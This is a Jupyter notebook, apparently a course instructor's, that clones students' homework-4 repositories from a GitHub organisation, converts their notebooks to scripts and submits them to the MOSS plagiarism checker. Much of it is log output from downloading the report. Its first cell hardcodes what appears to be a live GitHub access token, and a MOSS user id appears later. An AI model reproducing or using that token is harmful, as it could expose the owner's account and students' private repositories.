"def walk_through_sites(outgroup_seq, outgroup_aa_seq, input_file_alignment, viruses):\n \n #at each site, count number of viruses with polymorphism\n count_polymorphic = np.zeros(len(outgroup_seq))\n #at each site, count totaly number of viruses\n count_total_unambiguous = np.zeros(len(outgroup_seq))\n \n count_replacement_mutations = np.zeros(len(outgroup_seq))\n count_silent_mutations = np.zeros(len(outgroup_seq))\n \n #at each site, list of nucleotide from each virus\n ingroup_bases = [[] for x in range(len(outgroup_seq))]\n\n with open(input_file_alignment, \"r\") as aligned_handle:\n for virus in SeqIO.parse(aligned_handle, \"fasta\"):\n #Only viruses in time window\n if virus.id in viruses:\n #check\n if len(virus.seq) != len(outgroup_seq):\n print(virus)\n elif len(virus.seq) == len(outgroup_seq): \n for pos in range(len(outgroup_seq)):\n outgroup_nt = str(outgroup_seq[pos])\n virus_nt = str(virus.seq[pos])\n #skip ambiguous sites\n if virus_nt != 'N':\n ingroup_bases[pos].append(virus_nt)\n count_total_unambiguous[pos]+=1\n if virus_nt != outgroup_nt:\n count_polymorphic[pos]+=1\n #determine silent or replacement\n codon = math.floor(pos/3)\n codon_pos = pos-(codon*3)\n if codon_pos == 0:\n codon_nt = virus.seq[pos:(pos+3)]\n elif codon_pos == 1:\n codon_nt = virus.seq[(pos-1):(pos+2)]\n elif codon_pos == 2:\n codon_nt = virus.seq[(pos-2):(pos+1)]\n codon_aa = codon_nt.translate()\n outgroup_aa = outgroup_aa_seq[codon]\n if codon_aa != outgroup_aa:\n count_replacement_mutations[pos]+=1\n elif codon_aa == outgroup_aa:\n count_silent_mutations[pos]+=1\n \n polymorphic_frequencies = count_polymorphic/count_total_unambiguous\n \n replacement_score = count_replacement_mutations/count_total_unambiguous\n\n freq_bins = [frequency_binning(x) for x in polymorphic_frequencies]\n \n return freq_bins, replacement_score, ingroup_bases",
"_____no_output_____"
],
[
"def determine_site_type(outgroup, ingroup):\n ingroup_bases_nan = set(ingroup)\n #remove 'nan's\n ingroup_bases = {x for x in ingroup_bases_nan if pd.notna(x)}\n \n if len(ingroup_bases) == 0:\n site_type = None\n \n elif len(ingroup_bases) != 0:\n #all ingroup bases are identical\n if len(ingroup_bases) == 1:\n if outgroup in ingroup_bases:\n site_type = 1\n elif outgroup not in ingroup_bases:\n site_type = 2\n\n #2 different bases in ingroup\n elif len(ingroup_bases) == 2:\n if outgroup in ingroup_bases:\n site_type = 3\n elif outgroup not in ingroup_bases:\n site_type = 4\n\n #3 different bases in ingroup\n elif len(ingroup_bases) == 3:\n if outgroup in ingroup_bases:\n site_type = 5\n elif outgroup not in ingroup_bases:\n site_type = 6\n\n #4 different bases in ingroup\n elif len(ingroup_bases) == 4:\n site_type = 7\n \n return site_type",
"_____no_output_____"
],
[
"def fixation_polymorphism_score(outgroup, ingroup):\n site_type = determine_site_type(outgroup, ingroup)\n \n if site_type == None:\n Fi = float('nan')\n Pi = float('nan')\n if site_type == 1:\n Fi = 0\n Pi = 0\n elif site_type == 2:\n Fi = 1\n Pi = 0\n elif site_type in [3,5,7]:\n Fi = 0\n Pi = 1\n elif site_type == 4:\n Fi = 0.5\n Pi = 0.5\n elif site_type == 6:\n Fi = (1/3)\n Pi = (2/3)\n \n return Fi, Pi",
"_____no_output_____"
],
[
"def assign_fi_pi(outgroup_seq, ingroup_bases):\n \n #at each site, record Fi\n Fi_all = np.zeros(len(outgroup_seq))\n \n #at each site, record Pi\n Pi_all = np.zeros(len(outgroup_seq))\n \n for pos in range(len(outgroup_seq)):\n outgroup_nt = outgroup_seq[pos]\n ingroup_nts = ingroup_bases[pos]\n Fi, Pi = fixation_polymorphism_score(outgroup_nt, ingroup_nts)\n Fi_all[pos] = Fi\n Pi_all[pos] = Pi\n \n return Fi_all, Pi_all\n \n \n ",
"_____no_output_____"
],
[
"def calc_site_stats(cov, gene, window):\n #Find percent polymorphism at each site\n #Also determine whether polymorphism is silent or replacement\n input_file_outgroup = '../'+str(cov)+'/auspice/seasonal_corona_'+str(cov)+'_'+str(gene)+'_root-sequence.json'\n input_file_alignment = '../'+str(cov)+'/results/aligned_'+str(cov)+'_'+str(gene)+'.fasta'\n metafile = '../'+str(cov)+'/results/metadata_'+str(cov)+'_'+str(gene)+'.tsv'\n\n #Subset data based on time windows\n meta = pd.read_csv(metafile, sep = '\\t')\n meta.drop(meta[meta['date']=='?'].index, inplace=True)\n meta.dropna(subset=['date'], inplace=True)\n meta['year'] = meta['date'].str[:4].astype('int')\n date_range = meta['year'].max() - meta['year'].min()\n \n #Group viruses by time windows\n virus_time_subset = {}\n if window == 'all':\n years = str(meta['year'].min()) + '-' + str(meta['year'].max())\n virus_time_subset[years] = meta['strain'].tolist()\n else:\n date_window_start = meta['year'].min()\n date_window_end = meta['year'].min() + window\n while date_window_end <= meta['year'].max():\n years = str(date_window_start) + '-' + str(date_window_end)\n strains = meta[(meta['year']>=date_window_start) & (meta['year']<date_window_end)]['strain'].tolist()\n virus_time_subset[years] = strains\n #sliding window\n date_window_end += 1\n date_window_start += 1 \n \n #Find outgroup sequence\n outgroup_seq = ''\n outgroup_aa_seq = ''\n with open(input_file_outgroup, \"r\") as outgroup_handle:\n outgroup = json.load(outgroup_handle)\n outgroup_seq = SeqRecord(Seq(outgroup['nuc']))\n outgroup_aa_seq = outgroup_seq.translate()\n\n #initiate lists to record all time windows\n year_windows = []\n seqs_in_window = []\n frequency_bins = []\n fixation_scores = []\n polymorphism_scores = []\n replacement_scores = []\n silent_scores = [] \n \n #each time window separately\n for years, subset_viruses in virus_time_subset.items():\n if len(subset_viruses) != 0:\n year_windows.append(years)\n seqs_in_window.append(len(subset_viruses))\n \n freq_bins, replacement_score, ingroup_bases = walk_through_sites(outgroup_seq, outgroup_aa_seq, \n input_file_alignment, subset_viruses)\n Fi_all, Pi_all = assign_fi_pi(outgroup_seq, ingroup_bases)\n silent_score = 1-replacement_score\n \n frequency_bins.append(freq_bins)\n fixation_scores.append(Fi_all)\n polymorphism_scores.append(Pi_all)\n replacement_scores.append(replacement_score)\n silent_scores.append(silent_score)\n \n return year_windows, seqs_in_window, frequency_bins, fixation_scores, polymorphism_scores, replacement_scores, silent_scores\n \n \n",
"_____no_output_____"
],
[
"#M=rm/sm \n#not expected to vary through time provided that long-term effective population sizes remain sufficiently large\n#For each gene, calculate M by combining site count among time points\n\ndef calc_m_ratio(cov, gene):\n if gene=='spike' or gene=='s1':\n (year_windows, seqs_in_window, frequency_bins, \n fixation_scores, polymorphism_scores, replacement_scores, silent_scores) = calc_site_stats(cov, 's2', 'all')\n else:\n (year_windows, seqs_in_window, frequency_bins, \n fixation_scores, polymorphism_scores, replacement_scores, silent_scores) = calc_site_stats(cov, gene, 'all')\n \n sm = 0\n rm = 0\n \n for site in range(len(frequency_bins[0])):\n freq_bin = frequency_bins[0][site]\n if freq_bin == 'm':\n sm+= (polymorphism_scores[0][site]*silent_scores[0][site])\n rm+= (polymorphism_scores[0][site]*replacement_scores[0][site])\n \n m_ratio = rm/sm\n \n return m_ratio",
"_____no_output_____"
],
[
"def bhatt_estimators(cov, gene, window):\n (year_windows, seqs_in_window, frequency_bins, \n fixation_scores, polymorphism_scores, \n replacement_scores, silent_scores) = calc_site_stats(cov, gene, window)\n \n m_ratio = calc_m_ratio(cov, gene)\n \n #Initiate lists to store a values\n window_midpoint = []\n adaptive_substitutions = []\n \n #for each window, calculate bhatt estimators \n for years_window in range(len(frequency_bins)):\n #don't use windows with fewer than 5 sequences\n if seqs_in_window[years_window] >= 5:\n window_start = int(year_windows[years_window][0:4])\n window_end = int(year_windows[years_window][-4:])\n window_midpoint.append((window_start + window_end)/2)\n\n sf = 0\n rf = 0\n sh = 0\n rh = 0\n sm = 0\n rm = 0\n sl = 0\n rl = 0\n\n #calculate number of sites in different catagories (defined by polymorphic freq at that site)\n window_freq_bins = frequency_bins[years_window]\n for site in range(len(window_freq_bins)):\n freq_bin = window_freq_bins[site]\n #ignore sites with no polymorphisms?\n if freq_bin!='nan':\n if freq_bin == 'f':\n sf+= (fixation_scores[years_window][site]*silent_scores[years_window][site])\n rf+= (fixation_scores[years_window][site]*replacement_scores[years_window][site])\n elif freq_bin == 'h':\n sh+= (polymorphism_scores[years_window][site]*silent_scores[years_window][site])\n rh+= (polymorphism_scores[years_window][site]*replacement_scores[years_window][site])\n elif freq_bin == 'm':\n sm+= (polymorphism_scores[years_window][site]*silent_scores[years_window][site])\n rm+= (polymorphism_scores[years_window][site]*replacement_scores[years_window][site])\n elif freq_bin == 'l':\n sl+= (polymorphism_scores[years_window][site]*silent_scores[years_window][site])\n rl+= (polymorphism_scores[years_window][site]*replacement_scores[years_window][site]) \n \n# print(year_windows[years_window])\n# print(sf, rf, sh, rh, sm, rm, sl, rl) \n\n #Calculate equation 1: number of nonneutral sites\n al = rl - sl*m_ratio\n ah = rh - sh*m_ratio\n af = rf - sf*m_ratio\n #set negative a values to zero\n if al < 0:\n al = 0\n if ah < 0:\n ah = 0\n if af < 0:\n af = 0\n\n# print(al, ah, af)\n\n #Calculate the number and proportion of all fixed or high-freq sites that have undergone adaptive change\n number_adaptive_substitutions = af + ah\n adaptive_substitutions.append(number_adaptive_substitutions)\n proportion_adaptive_sites = (af + ah)/(rf +rh)\n \n # get coeffs of linear fit\n slope, intercept, r_value, p_value, std_err = stats.linregress(window_midpoint, adaptive_substitutions)\n \n ax = sns.regplot(x= window_midpoint, y=adaptive_substitutions, \n line_kws={'label':\"y={0:.1f}x+{1:.1f}\".format(slope,intercept)})\n plt.ylabel('number of adaptive substitutions')\n plt.xlabel('year')\n \n ax.legend()\n plt.show()\n ",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
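A compact restatement, in math form, of the quantities the code above computes (following the implementation in `calc_m_ratio` and `bhatt_estimators`, not an external derivation): with silent and replacement polymorphism counts s and r in the low (l), mid (m), high (h), and fixed (f) frequency classes,

```latex
% M is pooled over the whole time span, from mid-frequency sites only
M = \frac{r_m}{s_m}

% Equation 1: number of non-neutral sites per class (negative values truncated to 0)
a_l = r_l - s_l M, \qquad a_h = r_h - s_h M, \qquad a_f = r_f - s_f M

% Per time window
\text{adaptive substitutions} = a_f + a_h, \qquad
\text{proportion adaptive} = \frac{a_f + a_h}{r_f + r_h}
```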
cb01861e0e9b4d336b5cd2c214762a4b8cd61124 | 6,020 | ipynb | Jupyter Notebook | master/_downloads/cc2d1e2d3ec6e3b42bceea0b50c4db77/plot_wass1d_torch.ipynb | PythonOT/pythonot.github.io | 102512d51c24679b61bec8986806dc9063f81676 | [
"MIT"
] | 5 | 2020-06-12T10:53:15.000Z | 2021-11-06T13:21:56.000Z | master/_downloads/cc2d1e2d3ec6e3b42bceea0b50c4db77/plot_wass1d_torch.ipynb | PythonOT/pythonot.github.io | 102512d51c24679b61bec8986806dc9063f81676 | [
"MIT"
] | 1 | 2020-08-28T08:15:56.000Z | 2020-08-28T08:15:56.000Z | master/_downloads/cc2d1e2d3ec6e3b42bceea0b50c4db77/plot_wass1d_torch.ipynb | PythonOT/pythonot.github.io | 102512d51c24679b61bec8986806dc9063f81676 | [
"MIT"
] | 1 | 2020-08-28T08:08:09.000Z | 2020-08-28T08:08:09.000Z | 83.611111 | 2,103 | 0.647841 | [
[
[
"%matplotlib inline",
"_____no_output_____"
]
],
[
[
"\n# Wasserstein 1D with PyTorch\n\nIn this small example, we consider the following minization problem:\n\n\\begin{align}\\mu^* = \\min_\\mu W(\\mu,\\nu)\\end{align}\n\nwhere $\\nu$ is a reference 1D measure. The problem is handled\nby a projected gradient descent method, where the gradient is computed\nby pyTorch automatic differentiation. The projection on the simplex\nensures that the iterate will remain on the probability simplex.\n\nThis example illustrates both `wasserstein_1d` function and backend use within\nthe POT framework.\n",
"_____no_output_____"
]
],
[
[
"# Author: Nicolas Courty <[email protected]>\n# Rémi Flamary <[email protected]>\n#\n# License: MIT License\n\nimport numpy as np\nimport matplotlib.pylab as pl\nimport matplotlib as mpl\nimport torch\n\nfrom ot.lp import wasserstein_1d\nfrom ot.datasets import make_1D_gauss as gauss\nfrom ot.utils import proj_simplex\n\nred = np.array(mpl.colors.to_rgb('red'))\nblue = np.array(mpl.colors.to_rgb('blue'))\n\n\nn = 100 # nb bins\n\n# bin positions\nx = np.arange(n, dtype=np.float64)\n\n# Gaussian distributions\na = gauss(n, m=20, s=5) # m= mean, s= std\nb = gauss(n, m=60, s=10)\n\n# enforce sum to one on the support\na = a / a.sum()\nb = b / b.sum()\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n# use pyTorch for our data\nx_torch = torch.tensor(x).to(device=device)\na_torch = torch.tensor(a).to(device=device).requires_grad_(True)\nb_torch = torch.tensor(b).to(device=device)\n\nlr = 1e-6\nnb_iter_max = 800\n\nloss_iter = []\n\npl.figure(1, figsize=(8, 4))\npl.plot(x, a, 'b', label='Source distribution')\npl.plot(x, b, 'r', label='Target distribution')\n\nfor i in range(nb_iter_max):\n # Compute the Wasserstein 1D with torch backend\n loss = wasserstein_1d(x_torch, x_torch, a_torch, b_torch, p=2)\n # record the corresponding loss value\n loss_iter.append(loss.clone().detach().cpu().numpy())\n loss.backward()\n\n # performs a step of projected gradient descent\n with torch.no_grad():\n grad = a_torch.grad\n a_torch -= a_torch.grad * lr # step\n a_torch.grad.zero_()\n a_torch.data = proj_simplex(a_torch) # projection onto the simplex\n\n # plot one curve every 10 iterations\n if i % 10 == 0:\n mix = float(i) / nb_iter_max\n pl.plot(x, a_torch.clone().detach().cpu().numpy(), c=(1 - mix) * blue + mix * red)\n\npl.legend()\npl.title('Distribution along the iterations of the projected gradient descent')\npl.show()\n\npl.figure(2)\npl.plot(range(nb_iter_max), loss_iter, lw=3)\npl.title('Evolution of the loss along iterations', fontsize=16)\npl.show()",
"_____no_output_____"
]
],
[
[
"## Wasserstein barycenter\nIn this example, we consider the following Wasserstein barycenter problem\n$$ \\\\eta^* = \\\\min_\\\\eta\\;\\;\\; (1-t)W(\\\\mu,\\\\eta) + tW(\\\\eta,\\\\nu)$$\nwhere $\\\\mu$ and $\\\\nu$ are reference 1D measures, and $t$\nis a parameter $\\in [0,1]$. The problem is handled by a project gradient\ndescent method, where the gradient is computed by pyTorch automatic differentiation.\nThe projection on the simplex ensures that the iterate will remain on the\nprobability simplex.\n\nThis example illustrates both `wasserstein_1d` function and backend use within the\nPOT framework.\n\n",
"_____no_output_____"
]
],
[
[
"device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n# use pyTorch for our data\nx_torch = torch.tensor(x).to(device=device)\na_torch = torch.tensor(a).to(device=device)\nb_torch = torch.tensor(b).to(device=device)\nbary_torch = torch.tensor((a + b).copy() / 2).to(device=device).requires_grad_(True)\n\n\nlr = 1e-6\nnb_iter_max = 2000\n\nloss_iter = []\n\n# instant of the interpolation\nt = 0.5\n\nfor i in range(nb_iter_max):\n # Compute the Wasserstein 1D with torch backend\n loss = (1 - t) * wasserstein_1d(x_torch, x_torch, a_torch.detach(), bary_torch, p=2) + t * wasserstein_1d(x_torch, x_torch, b_torch, bary_torch, p=2)\n # record the corresponding loss value\n loss_iter.append(loss.clone().detach().cpu().numpy())\n loss.backward()\n\n # performs a step of projected gradient descent\n with torch.no_grad():\n grad = bary_torch.grad\n bary_torch -= bary_torch.grad * lr # step\n bary_torch.grad.zero_()\n bary_torch.data = proj_simplex(bary_torch) # projection onto the simplex\n\npl.figure(3, figsize=(8, 4))\npl.plot(x, a, 'b', label='Source distribution')\npl.plot(x, b, 'r', label='Target distribution')\npl.plot(x, bary_torch.clone().detach().cpu().numpy(), c='green', label='W barycenter')\npl.legend()\npl.title('Wasserstein barycenter computed by gradient descent')\npl.show()\n\npl.figure(4)\npl.plot(range(nb_iter_max), loss_iter, lw=3)\npl.title('Evolution of the loss along iterations', fontsize=16)\npl.show()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb01aaa61151fd8b9ea21cbd7fd33c1e83130325 | 794,960 | ipynb | Jupyter Notebook | Download_Repos.ipynb | rajathkmp/COMS4995-s18 | ab3e7687ef713e11b9c674acc20ff405636aa7a6 | [
"CC0-1.0"
] | null | null | null | Download_Repos.ipynb | rajathkmp/COMS4995-s18 | ab3e7687ef713e11b9c674acc20ff405636aa7a6 | [
"CC0-1.0"
] | null | null | null | Download_Repos.ipynb | rajathkmp/COMS4995-s18 | ab3e7687ef713e11b9c674acc20ff405636aa7a6 | [
"CC0-1.0"
] | 1 | 2020-04-05T01:50:41.000Z | 2020-04-05T01:50:41.000Z | 70.487675 | 142 | 0.719658 | [
[
[
"from github import Github\nimport tqdm\n# First create a Github instance:\n\ng = Github(\"5c103d46120d27b0fac5d9d1b9df0b91c77c5d42\")\n",
"_____no_output_____"
],
[
"org = g.get_organization(\"applied-ml-spring-18\")",
"_____no_output_____"
],
[
"repos = org.get_repos()",
"_____no_output_____"
],
[
"repos_list = list(repos)",
"_____no_output_____"
],
[
"hw4 = [repo for repo in repos_list if \"homework-4\" in repo.full_name]",
"_____no_output_____"
],
[
"import os",
"_____no_output_____"
],
[
"os.chdir(\"/home/andy/Dropbox/columbia_safe/applied_machine_learning_spring_2018/submissions/\")",
"_____no_output_____"
],
[
"import shutil\nfrom os import listdir\n\n\n",
"_____no_output_____"
],
[
"for repo in tqdm.tqdm(hw4):\n #print(repo.ssh_url)\n if not os.path.exists(repo.name):\n os.system(\"git clone {}\".format(repo.ssh_url))",
"100%|██████████| 86/86 [00:00<00:00, 45423.77it/s]\n"
]
],
[
[
"## Remove empty folders",
"_____no_output_____"
]
],
[
[
"import shutil\nfrom os import listdir\nfor repo in hw4:\n try:\n l = listdir(repo.name)\n except FileNotFoundError:\n pass\n if len(l) < 2:\n # has .git folder\n shutil.rmtree(repo.name)\n",
"_____no_output_____"
]
],
[
[
"### Convert notebooks to python files",
"_____no_output_____"
]
],
[
[
"\nfrom glob import glob\n\nnotebooks = glob(\"*/*.ipynb\")",
"_____no_output_____"
],
[
"import nbconvert",
"_____no_output_____"
],
[
"import shlex\nfor notebook in tqdm.tqdm(notebooks):\n #print(notebook)\n # fixme: whitespace in names?\n if not os.path.exists(notebook.replace(\"ipynb\", \"py\")):\n os.system(\"jupyter-nbconvert {} --to script\".format(shlex.quote(notebook)))",
"100%|██████████| 109/109 [00:00<00:00, 44201.79it/s]\n"
],
[
"import mosspy\n\nuserid = 321\n\nm = mosspy.Moss(userid, \"python\")\nm.setDirectoryMode(1)\n\n\n# Submission Files\nm.addFilesByWildcard(\"*/*.py\")\n\nurl = m.send() # Submission Report URL\n\nprint (\"Report Url: \" + url)\n\n",
"Report Url: http://moss.stanford.edu/results/374137986\n"
]
],
[
[
"http://moss.stanford.edu/results/374137986\n",
"_____no_output_____"
]
],
[
[
"# Save report file\nm.saveWebPage(url, \"report2.html\")",
"_____no_output_____"
],
[
"# Download whole report locally including code diff links\nmosspy.download_report(url, \"submission2/\", connections=8, log_level=20)",
"DEBUG:root:================================================================================\nDEBUG:root:Downloading Moss Report - URL: http://moss.stanford.edu/results/374137986\nDEBUG:root:================================================================================\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match2.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match3.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match4.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match5.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match6.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match7.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match8.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match9.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match10.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match11.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match12.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match13.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match14.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match15.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match16.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match17.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match18.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match19.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match20.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match21.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match22.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match23.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match24.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match25.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match26.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match27.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match28.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match29.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match30.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match31.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match32.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match33.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match34.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match35.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match36.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match37.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match38.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match39.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match40.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match41.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match42.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match43.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match44.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match45.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match46.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match47.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match48.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match49.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match50.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match51.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match52.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match53.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match54.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match55.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match56.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match57.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match58.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match59.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match60.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match61.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match62.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match63.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match64.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match65.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match66.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match67.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match70.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match69.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match68.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match71.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match72.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match73.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match74.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match75.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match76.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match77.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match78.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match79.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match80.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match81.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match82.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match83.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match84.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match85.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match86.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match87.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match88.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match89.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match90.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match91.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match92.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match93.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match94.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match95.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match96.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match97.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match98.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match99.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match100.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match101.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match102.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match103.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match104.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match105.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match106.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match107.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match108.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match109.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match110.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match112.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match111.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match113.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match114.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match115.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match116.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match117.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match118.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match119.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match120.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match121.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match122.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match123.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match124.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match125.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match126.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match127.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match128.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match129.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match130.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match131.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match132.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match133.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match134.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match135.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match136.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match137.html\nDEBUG:root:Processing URL: 